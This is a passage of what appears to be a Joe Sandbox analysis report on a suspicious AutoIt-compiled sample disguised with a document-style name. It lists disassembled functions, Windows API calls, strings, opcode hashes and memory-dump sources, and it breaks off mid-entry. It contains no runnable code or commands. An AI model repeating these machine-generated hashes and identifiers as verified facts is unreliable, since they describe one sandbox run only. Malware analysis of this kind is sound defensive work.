                                                        • Opcode ID: 43dddb425142b0240ae27ae131fe700cfc20d864b7502b661ea884304047bd27
                                                        • Instruction ID: 8987013b6cd0ba046d1b951ace2d9a9503c8e880f9d2785f8dcb6208e58680ba
                                                        • Opcode Fuzzy Hash: 43dddb425142b0240ae27ae131fe700cfc20d864b7502b661ea884304047bd27
                                                        • Instruction Fuzzy Hash: 5BA15B35204701EFC710DF14C895B5AB7E4BF89720F048459F99AAB3A2DB38ED85CB82
                                                        Function 007342EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                        • String ID:
                                                        • API String ID: 3877424927-0
                                                        • Opcode ID: 3af6bf1f2897bd57cc1c62b3d674bf095c10ee803b68375a69726c3ec1f1bf85
                                                        • Instruction ID: 9d3fbb5aa916a1ce75239c30afcb8de468dab3e8c3e14ec24b7af0672ea11b63
                                                        • Opcode Fuzzy Hash: 3af6bf1f2897bd57cc1c62b3d674bf095c10ee803b68375a69726c3ec1f1bf85
                                                        • Instruction Fuzzy Hash: 6E51B570A00345DBFB2C9F69C8846AE77A5AF40360F248739F865A72D2D778FD519B40
                                                        Function 0071131C Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007116F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00711751
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0071159B
                                                        • CoInitialize.OLE32(00000000), ref: 00711612
                                                        • CloseHandle.KERNEL32(00000000), ref: 007858F7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                        • String ID: '/u
                                                        • API String ID: 458326420-4029691049
                                                        • Opcode ID: 7cad7987c0eb61da53e6869d9d82465d2c45c22f12bb449277322604043089e6
                                                        • Instruction ID: fd6acf4415f8846f676f311584984f058037b2655535098ff144bd7f53c0f3c4
                                                        • Opcode Fuzzy Hash: 7cad7987c0eb61da53e6869d9d82465d2c45c22f12bb449277322604043089e6
                                                        • Instruction Fuzzy Hash: 25719BB4A06281EAC310DFAAB994494BBB5FB593543D4C27FD00A873B2DB7C8854CF59
                                                        Function 0075C4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock_memmove
                                                        • String ID: EA06
                                                        • API String ID: 1988441806-3962188686
                                                        • Opcode ID: 261d30e67a71c3d7146244e2923acda180b5328e1304374ad932758c7dd1d8f9
                                                        • Instruction ID: 7ac83dda28c07b065d2c7955333e79b910316bb24625a7613d36f8a5a11164c6
                                                        • Opcode Fuzzy Hash: 261d30e67a71c3d7146244e2923acda180b5328e1304374ad932758c7dd1d8f9
                                                        • Instruction Fuzzy Hash: E101F972900258BEEB18C798C816FFE7BF89B05711F00415EE553D2181E5B8A7088B60
                                                        Function 0073010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007345EC: __FF_MSGBANNER.LIBCMT ref: 00734603
                                                          • Part of subcall function 007345EC: __NMSG_WRITE.LIBCMT ref: 0073460A
                                                          • Part of subcall function 007345EC: RtlAllocateHeap.NTDLL(01760000,00000000,00000001), ref: 0073462F
                                                        • std::exception::exception.LIBCMT ref: 0073013E
                                                        • __CxxThrowException@8.LIBCMT ref: 00730153
                                                          • Part of subcall function 00737495: RaiseException.KERNEL32(?,?,0071125D,007C6598,?,?,?,00730158,0071125D,007C6598,?,00000001), ref: 007374E6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                        • String ID: bad allocation
                                                        • API String ID: 3902256705-2104205924
                                                        • Opcode ID: b19150854514076161462baf7292e3b7f9f1c68a4b7761b42b11207d728afa3c
                                                        • Instruction ID: bc9d2cd2d2c3bf15bea68fbc63878711da007caac3e2dba61d240148b2ee5dee
                                                        • Opcode Fuzzy Hash: b19150854514076161462baf7292e3b7f9f1c68a4b7761b42b11207d728afa3c
                                                        • Instruction Fuzzy Hash: 57F02D7500410DE6EB29ABA8DC19ADE77DC9F04350F104025F90491083DB789E90D6E4
                                                        Function 0075D009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 0075D01E
                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0075D035
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Temp$FileNamePath
                                                        • String ID: aut
                                                        • API String ID: 3285503233-3010740371
                                                        • Opcode ID: 4c388d8c4bd05e1b0852554925fa75015bdae19b7efbaa40573d335c5c0c00ed
                                                        • Instruction ID: 6361bdf5984dced49a89ea0feca9998adc5a90a0c07b13bda1fbe69379b0105e
                                                        • Opcode Fuzzy Hash: 4c388d8c4bd05e1b0852554925fa75015bdae19b7efbaa40573d335c5c0c00ed
                                                        • Instruction Fuzzy Hash: 67D05EB154030EBBDB20ABA0ED0EF99B76CA700B09F1081917614D10D1D3F8EA468BA4
                                                        Function 00713598 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 007135BE
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00713667
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell__memset
                                                        • String ID:
                                                        • API String ID: 928536360-0
                                                        • Opcode ID: 78b7d549c2af042d1710d6c5819d487bb2981bc165c8bf5245c4d6ffdf79e653
                                                        • Instruction ID: 7b4473353ad67dd91e9afef968ff804157b7f2830d3c04ca5cf511ad3e821b2a
                                                        • Opcode Fuzzy Hash: 78b7d549c2af042d1710d6c5819d487bb2981bc165c8bf5245c4d6ffdf79e653
                                                        • Instruction Fuzzy Hash: 063161B0605341EFD721DF28D8456D7BBF4FB49704F00492EF59A83281E779AA88CB66
                                                        Function 007345EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __FF_MSGBANNER.LIBCMT ref: 00734603
                                                          • Part of subcall function 00738E52: __NMSG_WRITE.LIBCMT ref: 00738E79
                                                          • Part of subcall function 00738E52: __NMSG_WRITE.LIBCMT ref: 00738E83
                                                        • __NMSG_WRITE.LIBCMT ref: 0073460A
                                                          • Part of subcall function 00738EB2: GetModuleFileNameW.KERNEL32(00000000,007D0312,00000104,?,00000001,00730127), ref: 00738F44
                                                          • Part of subcall function 00738EB2: ___crtMessageBoxW.LIBCMT ref: 00738FF2
                                                          • Part of subcall function 00731D65: ___crtCorExitProcess.LIBCMT ref: 00731D6B
                                                          • Part of subcall function 00731D65: ExitProcess.KERNEL32 ref: 00731D74
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        • RtlAllocateHeap.NTDLL(01760000,00000000,00000001), ref: 0073462F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1372826849-0
                                                        • Opcode ID: fa1711bd30124d740f06f08bbef19577c523bffd8981d3f752d74cd9197b5f13
                                                        • Instruction ID: 42a38c992f504068764ed5d13a407217a72d34446cd82835f624346fca182e32
                                                        • Opcode Fuzzy Hash: fa1711bd30124d740f06f08bbef19577c523bffd8981d3f752d74cd9197b5f13
                                                        • Instruction Fuzzy Hash: 1901F531641301EAFA282F34AC17B6A3358EF82B61F51012AF5019B1C3DFBCBC408666
                                                        Function 0075CFC8 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0075CC71,?,?,?,?,?,00000004), ref: 0075CFE1
                                                        • SetFileTime.KERNEL32(00000000,?,00000000,?,?,0075CC71,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0075CFF7
                                                        • CloseHandle.KERNEL32(00000000,?,0075CC71,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0075CFFE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleTime
                                                        • String ID:
                                                        • API String ID: 3397143404-0
                                                        • Opcode ID: b06c394a8e4b940acc72ba1242bd07cade931836cb262c495d90aa73c1a7f0cd
                                                        • Instruction ID: 211f03578e5864ad34f0a1753908b759d0efff7f17f33232716c8459f4d24350
                                                        • Opcode Fuzzy Hash: b06c394a8e4b940acc72ba1242bd07cade931836cb262c495d90aa73c1a7f0cd
                                                        • Instruction Fuzzy Hash: A2E0E633181218B7D7311B54AC0AFCA7B19EB05775F118111FB55690E087B56D52979C
                                                        Function 0075C450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 0075C45E
                                                          • Part of subcall function 007328CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00738715,00000000,007388A3,00734673,?), ref: 007328DE
                                                          • Part of subcall function 007328CA: GetLastError.KERNEL32(00000000,?,00738715,00000000,007388A3,00734673,?), ref: 007328F0
                                                        • _free.LIBCMT ref: 0075C46F
                                                        • _free.LIBCMT ref: 0075C481
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 409dc5471866d52cb660d3acacbc6baa69eb1666097d1b0fc545827c793d8a90
                                                        • Instruction ID: f8152d98608155b637a22fd02963b16529e2ed6cabea6b629c783649aaeea60a
                                                        • Opcode Fuzzy Hash: 409dc5471866d52cb660d3acacbc6baa69eb1666097d1b0fc545827c793d8a90
                                                        • Instruction Fuzzy Hash: 92E0C2B1200790CAEA20A9786848FF3A3CC6F04312F04082DF889D3143CF5CE8418034
                                                        Function 0072058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CALL
                                                        • API String ID: 0-4196123274
                                                        • Opcode ID: 413bc6bd6fbc9bcff3158879f5ba7c67b16646850b0deb8b201b190406e0b123
                                                        • Instruction ID: 30dea34444c7921aca1fcfbb81d73ee65037a19d232552682062df3bfe784d19
                                                        • Opcode Fuzzy Hash: 413bc6bd6fbc9bcff3158879f5ba7c67b16646850b0deb8b201b190406e0b123
                                                        • Instruction Fuzzy Hash: E1227C70508351DFD724DF28D494A6AB7E1FF84300F15896DE89A8B362D739EC85CB92
                                                        Function 00714010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: EA06
                                                        • API String ID: 4104443479-3962188686
                                                        • Opcode ID: e027d2c8d78171836258de77ef1eeb66af8ef019c2229fe11d2887e1794d3c4d
                                                        • Instruction ID: 9588648ea6dc479d11566f7f9441ac800f7a4d3e5a67a2d22c9cd6d739e46c6d
                                                        • Opcode Fuzzy Hash: e027d2c8d78171836258de77ef1eeb66af8ef019c2229fe11d2887e1794d3c4d
                                                        • Instruction Fuzzy Hash: 4A419F71A0415CF7CF219B6C8C567FE7FA29B59300F2845A4EA82D72C3C62D8DC493A1
                                                        Function 00713BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00783CF1
                                                          • Part of subcall function 007131B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007131DA
                                                          • Part of subcall function 00713A67: SHGetMalloc.SHELL32(1<q), ref: 00713A7D
                                                          • Part of subcall function 00713A67: SHGetDesktopFolder.SHELL32(?), ref: 00713A8F
                                                          • Part of subcall function 00713A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00713AD2
                                                          • Part of subcall function 00713B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,007D22E8,?), ref: 00713B65
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                        • String ID: X
                                                        • API String ID: 2727075218-3081909835
                                                        • Opcode ID: 1ebd7b0d118175063b0ba29faeb9839e5514073ce646f89734b3309cf2f3281a
                                                        • Instruction ID: 04b732213fedb7e7838c18bb842e0d30bf3f9ae9d9e291d226a91d3788b7b077
                                                        • Opcode Fuzzy Hash: 1ebd7b0d118175063b0ba29faeb9839e5514073ce646f89734b3309cf2f3281a
                                                        • Instruction Fuzzy Hash: FE118DB1A10198EBDF05DF98D8096DE7BF9AF45704F04801DE401B7281DBBD5749CBA5
                                                        Function 007134C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 007834AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                        • API String ID: 1029625771-2684727018
                                                        • Opcode ID: ef6ef75c666367344661a30838018d666e184735b05b2209e1f75c2463a98988
                                                        • Instruction ID: 474cb3d7b33e6ca5a006518de062cd86868439d930751d34b5185ec755e7579e
                                                        • Opcode Fuzzy Hash: ef6ef75c666367344661a30838018d666e184735b05b2209e1f75c2463a98988
                                                        • Instruction Fuzzy Hash: 50F0447194024DEE9F11EEA8C8559FFB778AA10310B108526A82692182EB3C9B4ACB20
                                                        Function 007335E7 Relevance: 3.1, APIs: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memmove.LIBCMT ref: 0073367B
                                                        • __flush.LIBCMT ref: 0073369B
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __flush__getptd_noexit_memmove
                                                        • String ID:
                                                        • API String ID: 3662107617-0
                                                        • Opcode ID: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                                                        • Instruction ID: 30436b56abcf85340e8ee0b9b7ee35e1fdf5935d43502ac56b3b45494dcb431e
                                                        • Opcode Fuzzy Hash: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                                                        • Instruction Fuzzy Hash: 1A41A5B1B00606EFFF388E69C88656E77A5AF44360F24853DE855C7242DB79DF408B50
                                                        Function 00713682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • 745EC8D0.UXTHEME ref: 007136E6
                                                          • Part of subcall function 00732025: __lock.LIBCMT ref: 0073202B
                                                          • Part of subcall function 007132DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007132F6
